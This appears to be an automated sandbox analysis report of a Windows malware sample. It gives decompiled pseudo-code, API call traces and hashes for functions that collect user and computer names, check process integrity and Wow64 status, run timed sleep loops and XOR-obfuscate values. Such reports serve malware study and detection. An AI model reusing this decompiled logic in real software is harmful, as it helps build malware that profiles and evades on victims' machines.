                                                                                                                                                                                                                                                                                    0x00fc584b
                                                                                                                                                                                                                                                                                    0x00fc584d
                                                                                                                                                                                                                                                                                    0x00fc584d
                                                                                                                                                                                                                                                                                    0x00fc582b
                                                                                                                                                                                                                                                                                    0x00fc582d
                                                                                                                                                                                                                                                                                    0x00fc5859
                                                                                                                                                                                                                                                                                    0x00fc585a
                                                                                                                                                                                                                                                                                    0x00fc585a
                                                                                                                                                                                                                                                                                    0x00fc5829
                                                                                                                                                                                                                                                                                    0x00fc586f

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,00FC2DF9,?,00000001,?), ref: 00FC57B9
                                                                                                                                                                                                                                                                                    • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 00FC57CF
                                                                                                                                                                                                                                                                                    • _snwprintf.NTDLL ref: 00FC57F4
                                                                                                                                                                                                                                                                                    • CreateFileMappingW.KERNELBASE(000000FF,00FCA2D4,00000004,00000000,00001000,?), ref: 00FC5810
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9,?), ref: 00FC5822
                                                                                                                                                                                                                                                                                    • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000), ref: 00FC5839
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9), ref: 00FC585A
                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00FC2DF9,?), ref: 00FC5862
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1814172918-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 105e66c8db29b1e319d58db372d041b508eca14113f6dbe37c2db17b055b385e
                                                                                                                                                                                                                                                                                    • Instruction ID: d991f1c4e600fecec8eb44307969f79f89322a4fb0b063dbb0a307e8c7f00715
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 105e66c8db29b1e319d58db372d041b508eca14113f6dbe37c2db17b055b385e
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0C21D876944609FBD7119B64CE0BF9D77B9BB84B50F280028F605E71D0DB71A941EB50
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E00FC2D63(signed int __edx) {
                                                                                                                                                                                                                                                                                    				signed int _v8;
                                                                                                                                                                                                                                                                                    				long _v12;
                                                                                                                                                                                                                                                                                    				signed int _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				void* _v24;
                                                                                                                                                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                                                                                                                                                    				intOrPtr _v32;
                                                                                                                                                                                                                                                                                    				intOrPtr _v36;
                                                                                                                                                                                                                                                                                    				char _v40;
                                                                                                                                                                                                                                                                                    				void* __edi;
                                                                                                                                                                                                                                                                                    				void* __esi;
                                                                                                                                                                                                                                                                                    				void* _t27;
                                                                                                                                                                                                                                                                                    				long _t28;
                                                                                                                                                                                                                                                                                    				long _t31;
                                                                                                                                                                                                                                                                                    				intOrPtr _t32;
                                                                                                                                                                                                                                                                                    				void* _t36;
                                                                                                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                                                                                                    				intOrPtr _t38;
                                                                                                                                                                                                                                                                                    				void* _t39;
                                                                                                                                                                                                                                                                                    				CHAR* _t42;
                                                                                                                                                                                                                                                                                    				long _t48;
                                                                                                                                                                                                                                                                                    				long _t49;
                                                                                                                                                                                                                                                                                    				void* _t54;
                                                                                                                                                                                                                                                                                    				void* _t56;
                                                                                                                                                                                                                                                                                    				intOrPtr _t64;
                                                                                                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                                                                                                    				long _t71;
                                                                                                                                                                                                                                                                                    				void* _t72;
                                                                                                                                                                                                                                                                                    				signed char _t74;
                                                                                                                                                                                                                                                                                    				intOrPtr _t76;
                                                                                                                                                                                                                                                                                    				signed int _t77;
                                                                                                                                                                                                                                                                                    				long _t82;
                                                                                                                                                                                                                                                                                    				long _t84;
                                                                                                                                                                                                                                                                                    				CHAR* _t87;
                                                                                                                                                                                                                                                                                    				void* _t88;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t79 = __edx;
                                                                                                                                                                                                                                                                                    				_v16 = 0;
                                                                                                                                                                                                                                                                                    				_v8 = 0;
                                                                                                                                                                                                                                                                                    				_v12 = 0;
                                                                                                                                                                                                                                                                                    				_t27 = E00FC5901();
                                                                                                                                                                                                                                                                                    				if(_t27 != 0) {
                                                                                                                                                                                                                                                                                    					_t77 =  *0xfca2b4; // 0x2000000a
                                                                                                                                                                                                                                                                                    					_t73 = (_t77 & 0xf0000000) + _t27;
                                                                                                                                                                                                                                                                                    					 *0xfca2b4 = (_t77 & 0xf0000000) + _t27;
                                                                                                                                                                                                                                                                                    				}
				_t28 =  *0xfca14c(0, 2); // executed
				_v20 = _t28;
				if(_t28 == 0 || _t28 == 1 || _t28 == 0x80010106) {
					_t31 = E00FC4097( &_v8,  &_v16); // executed
					_push(0);
					_t84 = _t31;
					_t32 =  *0xfca2d0; // 0x292d5a8
					_push(0xfca2d8);
					_push(1);
					_t7 = _t32 + 0xfcb5bc; // 0x4d283a53
					 *0xfca2d4 = 0xc;
					 *0xfca2dc = 0;
					L00FC5EC2();
					_t36 = E00FC57AD(_t79,  &_v24,  &_v12); // executed
					if(_t36 == 0) {
						CloseHandle(_v24);
					}
					if(_t84 != 5) {
						_t37 = _v16;
						__eflags = _t37;
						if(_t37 != 0) {
							E00FC3946(_t37 ^ 0xe8fa7dd7,  &_v40);
							_t87 = E00FC5C4E(0x27);
							__eflags = _t87;
							if(_t87 != 0) {
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								asm("bswap eax");
								_t64 =  *0xfca2d0; // 0x292d5a8
								_t18 = _t64 + 0xfcb916; // 0x78383025
								wsprintfA(_t87, _t18, _v40, _v36, _v32, _v28);
								_t88 = _t88 + 0x18;
							}
							 *0xfca328 = _t87;
						}
						_t38 = E00FC2304();
						 *0xfca2c8 =  *0xfca2c8 ^ 0xe8fa7dd7;
						 *0xfca318 = _t38;
						_t39 = E00FC5C4E(0x60);
						__eflags = _t39;
						 *0xfca37c = _t39;
						if(_t39 == 0) {
							_t84 = 8;
						} else {
							memset(_t39, 0, 0x60);
							_t54 =  *0xfca37c; // 0x38f9630
							_t88 = _t88 + 0xc;
							__imp__(_t54 + 0x40);
							_t56 =  *0xfca37c; // 0x38f9630
							 *_t56 = 0xfcb882;
							_t84 = 0;
						}
						__eflags = _t84;
						if(_t84 == 0) {
							_t42 = RtlAllocateHeap( *0xfca290, _t84, 0x52);
							__eflags = _t42;
							 *0xfca310 = _t42;
							if(_t42 == 0) {
								_t84 = 8;
							} else {
								_t74 =  *0xfca2b4; // 0x2000000a
								_t79 = _t74 & 0x000000ff;
								_t76 =  *0xfca2d0; // 0x292d5a8
								_t19 = _t76 + 0xfcb212; // 0x697a6f4d
								_t73 = _t19;
								wsprintfA(_t42, _t19, _t74 & 0x000000ff, _t74 & 0x000000ff, 0xfc92c7);
							}
							__eflags = _t84;
							if(_t84 == 0) {
								asm("sbb eax, eax");
								E00FC3946( ~_v8 &  *0xfca2c8, 0xfca00c); // executed
								_t84 = E00FC374B(_t73);
								__eflags = _t84;
								if(_t84 != 0) {
									goto L31;
								}
								_t48 = E00FC3E8F(_t73); // executed
								__eflags = _t48;
								if(_t48 != 0) {
									__eflags = _v8;
									_t82 = _v12;
									if(_v8 != 0) {
										L30:
										_t49 = E00FC1B47(_t79, _t82, _v8); // executed
										_t84 = _t49;
										goto L31;
									}
									__eflags = _t82;
									if(__eflags == 0) {
										goto L31;
									}
									_t23 = _t82 + 4; // 0x5
									_t84 = E00FC5D26(__eflags, _t23);
									__eflags = _t84;
									if(_t84 == 0) {
										goto L31;
									}
									goto L30;
								}
								_t84 = 8;
							}
						}
					} else {
						_t71 = _v12;
						if(_t71 == 0) {
							L31:
							if(_v20 == 0 || _v20 == 1) {
								 *0xfca150();
							}
							goto L35;
						}
						_t72 = _t71 + 4;
						do {
							_push(1);
							_push(_t72);
							_t67 = 5;
						} while (E00FC63CD(_t67, 0) == 0x4c7);
					}
					goto L31;
				} else {
                                                                                                                                                                                                                                                                                    					_t84 = _t28;
                                                                                                                                                                                                                                                                                    					L35:
                                                                                                                                                                                                                                                                                    					return _t84;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    			}






































                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc2f72
                                                                                                                                                                                                                                                                                    0x00fc2f55
                                                                                                                                                                                                                                                                                    0x00fc2f55
                                                                                                                                                                                                                                                                                    0x00fc2f26
                                                                                                                                                                                                                                                                                    0x00fc2e0b
                                                                                                                                                                                                                                                                                    0x00fc2e0b
                                                                                                                                                                                                                                                                                    0x00fc2e10
                                                                                                                                                                                                                                                                                    0x00fc2f7f
                                                                                                                                                                                                                                                                                    0x00fc2f83
                                                                                                                                                                                                                                                                                    0x00fc2f8b
                                                                                                                                                                                                                                                                                    0x00fc2f8b
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc2f83
                                                                                                                                                                                                                                                                                    0x00fc2e16
                                                                                                                                                                                                                                                                                    0x00fc2e19
                                                                                                                                                                                                                                                                                    0x00fc2e19
                                                                                                                                                                                                                                                                                    0x00fc2e1b
                                                                                                                                                                                                                                                                                    0x00fc2e1e
                                                                                                                                                                                                                                                                                    0x00fc2e26
                                                                                                                                                                                                                                                                                    0x00fc2e2d
                                                                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                                                                    0x00fc2f93
                                                                                                                                                                                                                                                                                    0x00fc2f93
                                                                                                                                                                                                                                                                                    0x00fc2f96
                                                                                                                                                                                                                                                                                    0x00fc2f9b
                                                                                                                                                                                                                                                                                    0x00fc2f9b

                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5901: GetModuleHandleA.KERNEL32(4C44544E,00000000,00FC2D7C,00000000,00000000,00000000,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC5910
                                                                                                                                                                                                                                                                                    • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(4D283A53,00000001,00FCA2D8,00000000), ref: 00FC2DE7
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,00000001,?,?,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC2E00
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC2E80
                                                                                                                                                                                                                                                                                    • memset.NTDLL ref: 00FC2EB0
                                                                                                                                                                                                                                                                                    • RtlInitializeCriticalSection.NTDLL(038F95F0), ref: 00FC2EC1
                                                                                                                                                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000008,00000052,00000060), ref: 00FC2EEA
                                                                                                                                                                                                                                                                                    • wsprintfA.USER32 ref: 00FC2F1A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC397D
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: RtlAllocateHeap.NTDLL(00000000,00FC2F3F), ref: 00FC3994
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: GetUserNameW.ADVAPI32(00000000,00FC2F3F), ref: 00FC39A1
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00FC2F3F,?,?,?,?,?,00FC44F9,?,00000001), ref: 00FC39C2
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC39E9
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00FC39FD
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: GetComputerNameW.KERNEL32(00000000,00000000), ref: 00FC3A0A
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC3946: HeapFree.KERNEL32(00000000,00000000), ref: 00FC3A28
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Heap$AllocateName$ComputerDescriptorFreeHandleSecurityUserwsprintf$CloseConvertCriticalInitializeModuleSectionStringmemset
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 2910951584-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 34f0c42e45604abc25035dd579b0dab34559d4350da3a64b3c6ea77c0dde8508
                                                                                                                                                                                                                                                                                    • Instruction ID: dbcdd722c6254bd637aab621c3d310dd41c07307af2fce830347b248e25f1632
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34f0c42e45604abc25035dd579b0dab34559d4350da3a64b3c6ea77c0dde8508
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4E51CD71E0021EABD761DB649E8BFAE73B8EB04B24F04011DE805E7251D775AD40FBA1
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                    			E00FC1041(long* _a4) {
                                                                                                                                                                                                                                                                                    				long _v8;
                                                                                                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                                                                                                    				void _v16;
                                                                                                                                                                                                                                                                                    				long _v20;
                                                                                                                                                                                                                                                                                    				int _t33;
                                                                                                                                                                                                                                                                                    				void* _t46;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_v16 = 1;
                                                                                                                                                                                                                                                                                    				_v20 = 0x2000;
                                                                                                                                                                                                                                                                                    				if( *0xfca2b4 > 5) {
                                                                                                                                                                                                                                                                                    					_v16 = 0;
                                                                                                                                                                                                                                                                                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                                                                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                                                                                                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                                                                                                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                                                                                                                                                                                                                                                                                    						if(_v8 != 0) {
                                                                                                                                                                                                                                                                                    							_t46 = E00FC5C4E(_v8);
                                                                                                                                                                                                                                                                                    							if(_t46 != 0) {
                                                                                                                                                                                                                                                                                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                                                                                                                                                                                                                                                                                    								if(_t33 != 0) {
                                                                                                                                                                                                                                                                                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                                                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                                                                    								E00FC2A03(_t46);
                                                                                                                                                                                                                                                                                    							}
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						CloseHandle(_v12);
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				 *_a4 = _v20;
                                                                                                                                                                                                                                                                                    				return _v16;
                                                                                                                                                                                                                                                                                    			}










                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 00FC1073
                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,00000000,00000000), ref: 00FC1093
                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000), ref: 00FC10A3
                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00FC10F3
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,00000000,00000000,?), ref: 00FC10C6
                                                                                                                                                                                                                                                                                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00FC10CE
                                                                                                                                                                                                                                                                                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00FC10DE
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 1295030180-0
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 73%
                                                                                                                                                                                                                                                                                    			E00FC4430(signed int __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                    				struct _FILETIME _v12;
                                                                                                                                                                                                                                                                                    				char _v32;
                                                                                                                                                                                                                                                                                    				long _v40;
                                                                                                                                                                                                                                                                                    				void* _t14;
                                                                                                                                                                                                                                                                                    				void* _t16;
                                                                                                                                                                                                                                                                                    				int _t18;
                                                                                                                                                                                                                                                                                    				signed int _t20;
                                                                                                                                                                                                                                                                                    				void* _t22;
                                                                                                                                                                                                                                                                                    				signed int _t23;
                                                                                                                                                                                                                                                                                    				intOrPtr _t25;
                                                                                                                                                                                                                                                                                    				unsigned int _t29;
                                                                                                                                                                                                                                                                                    				signed int _t33;
                                                                                                                                                                                                                                                                                    				signed int _t40;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t33 = __edx;
                                                                                                                                                                                                                                                                                    				_t14 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                                                                    				 *0xfca290 = _t14;
                                                                                                                                                                                                                                                                                    				if(_t14 != 0) {
                                                                                                                                                                                                                                                                                    					 *0xfca180 = GetTickCount();
                                                                                                                                                                                                                                                                                    					_t16 = E00FC2A18(_a4);
                                                                                                                                                                                                                                                                                    					if(_t16 != 0) {
                                                                                                                                                                                                                                                                                    						L10:
                                                                                                                                                                                                                                                                                    						return _t16;
                                                                                                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                                                                                                    						goto L3;
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					do {
                                                                                                                                                                                                                                                                                    						L3:
                                                                                                                                                                                                                                                                                    						GetSystemTimeAsFileTime( &_v12);
                                                                                                                                                                                                                                                                                    						_t18 = SwitchToThread();
                                                                                                                                                                                                                                                                                    						_t29 = _v12.dwHighDateTime;
                                                                                                                                                                                                                                                                                    						_t20 = (_t29 << 0x00000020 | _v12.dwLowDateTime) >> 7;
                                                                                                                                                                                                                                                                                    						_push(0);
                                                                                                                                                                                                                                                                                    						_push(9);
                                                                                                                                                                                                                                                                                    						_push(_t29 >> 7);
                                                                                                                                                                                                                                                                                    						_push(_t20);
                                                                                                                                                                                                                                                                                    						L00FC80B2();
                                                                                                                                                                                                                                                                                    						_t40 = _t18 + _t20;
                                                                                                                                                                                                                                                                                    						_t22 = E00FC3F5D(_a4, _t40);
                                                                                                                                                                                                                                                                                    						_t23 = 2;
                                                                                                                                                                                                                                                                                    						Sleep(_t23 << _t40); // executed
                                                                                                                                                                                                                                                                                    					} while (_t22 == 1);
                                                                                                                                                                                                                                                                                    					_t25 =  *0xfca2ac; // 0x22c
                                                                                                                                                                                                                                                                                    					_v32 = 0;
                                                                                                                                                                                                                                                                                    					if(_t25 != 0) {
                                                                                                                                                                                                                                                                                    						__imp__(_t25,  &_v32);
                                                                                                                                                                                                                                                                                    						if(_t25 == 0) {
                                                                                                                                                                                                                                                                                    							_v40 = 0;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						if(_v40 != 0) {
                                                                                                                                                                                                                                                                                    							 *0xfca2b8 = 1; // executed
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					_t16 = E00FC2D63(_t33); // executed
                                                                                                                                                                                                                                                                                    					goto L10;
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				_t16 = 8;
                                                                                                                                                                                                                                                                                    				goto L10;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                    • HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001), ref: 00FC4445
                                                                                                                                                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00FC445C
                                                                                                                                                                                                                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,?,00000001), ref: 00FC447C
                                                                                                                                                                                                                                                                                    • SwitchToThread.KERNEL32(?,00000001), ref: 00FC4482
                                                                                                                                                                                                                                                                                    • _aullrem.NTDLL(?,?,00000009,00000000), ref: 00FC449E
                                                                                                                                                                                                                                                                                    • Sleep.KERNELBASE(00000002,00000000,?,00000001), ref: 00FC44B8
                                                                                                                                                                                                                                                                                    • IsWow64Process.KERNEL32(0000022C,?,?,00000001), ref: 00FC44D6
                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.1180370324.0000000000FC1000.00000020.00020000.sdmp, Offset: 00FC0000, based on PE: true
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180343519.0000000000FC0000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180434479.0000000000FC9000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180468493.0000000000FCA000.00000004.00020000.sdmp
                                                                                                                                                                                                                                                                                    • Associated: 00000000.00000002.1180500445.0000000000FCC000.00000002.00020000.sdmp
                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                    • API ID: Time$CountCreateFileHeapProcessSleepSwitchSystemThreadTickWow64_aullrem
                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                    • API String ID: 3690864001-0
                                                                                                                                                                                                                                                                                    • Opcode ID: 8066d8a71b1a72c8f6ff01fd1b99c7c0a7187202746f1b5f1d32bf0225943179
                                                                                                                                                                                                                                                                                    • Instruction ID: db57429eafc90c86641b14f07373cda2b6314682fbc98b55a654888dae8debe4
                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8066d8a71b1a72c8f6ff01fd1b99c7c0a7187202746f1b5f1d32bf0225943179
                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5521F0B2E04209AFD714EF74DE9BF6A7BA8EB44360F10492DF905C3190D774A804EB62
                                                                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                    C-Code - Quality: 64%
                                                                                                                                                                                                                                                                                    			E00FC5AE3(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                                                                                                                                                    				intOrPtr _t13;
                                                                                                                                                                                                                                                                                    				char* _t19;
                                                                                                                                                                                                                                                                                    				char* _t28;
                                                                                                                                                                                                                                                                                    				void* _t33;
                                                                                                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                                                                                                    				char* _t36;
                                                                                                                                                                                                                                                                                    				void* _t38;
                                                                                                                                                                                                                                                                                    				intOrPtr* _t39;
                                                                                                                                                                                                                                                                                    				char* _t40;
                                                                                                                                                                                                                                                                                    				char* _t42;
                                                                                                                                                                                                                                                                                    				char* _t43;
                                                                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                                                                    				_t34 = __edx;
                                                                                                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                                                                                                    				_t9 =  *0xfca2d0; // 0x292d5a8
                                                                                                                                                                                                                                                                                    				_t1 = _t9 + 0xfcb61b; // 0x253d7325
                                                                                                                                                                                                                                                                                    				_t36 = 0;
                                                                                                                                                                                                                                                                                    				_t28 = E00FC47BA(__ecx, _t1);
                                                                                                                                                                                                                                                                                    				if(_t28 != 0) {
                                                                                                                                                                                                                                                                                    					_t39 = __imp__;
                                                                                                                                                                                                                                                                                    					_t13 =  *_t39(_t28, _t38);
                                                                                                                                                                                                                                                                                    					_v8 = _t13;
                                                                                                                                                                                                                                                                                    					_t6 =  *_t39(_a4) + 1; // 0x38f9631
                                                                                                                                                                                                                                                                                    					_t40 = E00FC5C4E(_v8 + _t6);
                                                                                                                                                                                                                                                                                    					if(_t40 != 0) {
                                                                                                                                                                                                                                                                                    						strcpy(_t40, _t28);
                                                                                                                                                                                                                                                                                    						_pop(_t33);
                                                                                                                                                                                                                                                                                    						__imp__(_t40, _a4);
                                                                                                                                                                                                                                                                                    						_t19 = E00FC1AF1(_t33, _t34, _t40, _a8); // executed
                                                                                                                                                                                                                                                                                    						_t36 = _t19;
                                                                                                                                                                                                                                                                                    						E00FC2A03(_t40);
                                                                                                                                                                                                                                                                                    						_t42 = E00FC332F(StrTrimA(_t36, "="), _t36);
                                                                                                                                                                                                                                                                                    						if(_t42 != 0) {
                                                                                                                                                                                                                                                                                    							E00FC2A03(_t36);
                                                                                                                                                                                                                                                                                    							_t36 = _t42;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    						_t43 = E00FC4138(_t36, _t33);
                                                                                                                                                                                                                                                                                    						if(_t43 != 0) {
                                                                                                                                                                                                                                                                                    							E00FC2A03(_t36);
                                                                                                                                                                                                                                                                                    							_t36 = _t43;
                                                                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                                                                    					}
                                                                                                                                                                                                                                                                                    					E00FC2A03(_t28);
                                                                                                                                                                                                                                                                                    				}
                                                                                                                                                                                                                                                                                    				return _t36;
                                                                                                                                                                                                                                                                                    			}

















                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC47BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00FC5AFC,253D7325,00000000,00000000,?,00000000,00FC6301), ref: 00FC4821
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC47BA: sprintf.NTDLL ref: 00FC4842
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B0E
                                                                                                                                                                                                                                                                                    • lstrlen.KERNEL32(00000000,?,00000000,00FC6301,00000000,038F9630), ref: 00FC5B16
                                                                                                                                                                                                                                                                                      • Part of subcall function 00FC5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,00FC3FAA), ref: 00FC5C5A
                                                                                                                                                                                                                                                                                    • strcpy.NTDLL ref: 00FC5B2D
